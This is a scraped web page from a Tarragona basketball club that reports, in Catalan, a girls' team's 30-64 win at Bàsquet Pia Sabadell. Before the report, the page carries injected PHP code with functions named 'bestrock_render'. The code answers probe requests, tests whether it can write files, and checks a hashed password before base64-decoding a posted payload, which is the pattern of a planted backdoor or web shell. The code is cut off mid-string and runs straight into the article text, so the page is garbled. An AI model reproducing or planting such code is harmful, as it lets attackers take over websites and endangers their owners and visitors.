function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil Femení de 1r any 09A fa una segona part molt treballada i guanya a la pista del Bàsquet Pia Sabadell (30-64) - Tgn Bàsquet Club -

L’Infantil Femení de 1r any 09A fa una segona part molt treballada i guanya a la pista del Bàsquet Pia Sabadell (30-64)

Updated: octubre 26, 2021

L’Infantil Femení de 1r any 09A va començar el partit cometen molts errors que va saber rectificar en una magnifica segona part. Les liles van iniciar el primer quart desconcentrades i amb nervis. Van prendre males decisions a l’hora de finalitzar i van perdre moltes pilotes, arribant al descans amb un resultat ajustat de 18-21. Però les tarragonines van tornar en si i disposades a cap girar el partit per endur-se la victòria. Amb un parcial de 4-23 al tercer període i un de 8-20 al l’últim quart van deixar a les sabadellenques molt per rota del marcador i sense possibilitats de remuntar. Les del TGN van fer molt bons atacs en equip i van seleccionar d’allò més bé les opcions de tir.